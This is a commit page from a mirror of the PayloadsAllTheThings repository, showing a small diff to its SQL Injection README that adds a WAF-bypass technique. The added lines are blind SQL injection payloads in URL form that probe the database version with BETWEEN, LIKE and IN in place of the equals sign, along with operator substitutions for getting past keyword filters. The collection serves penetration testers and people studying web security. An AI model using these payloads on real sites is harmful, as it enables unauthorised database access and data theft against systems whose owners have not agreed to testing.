daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #113 from Q5Ca/patch-1 

Add bypass WAF no equal using BETWEEN
patch-1
Swissky 2019-10-28 18:21:26 +01:00 committed by GitHub
parent be3ef08d19 135af74acd
commit 534d46d0e4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
SQL Injection/README.md
View File

@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
No Equal - bypass using LIKE/NOT IN/IN
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
```sql
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
?id=1 and substring(version(),1,1) between 3 and 4
```
Blacklist using keywords - bypass using uppercase/lowercase
@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
```sql
AND -> &&
OR -> ||
= -> LIKE,REGEXP, not < and not >
= -> LIKE,REGEXP, BETWEEN, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
```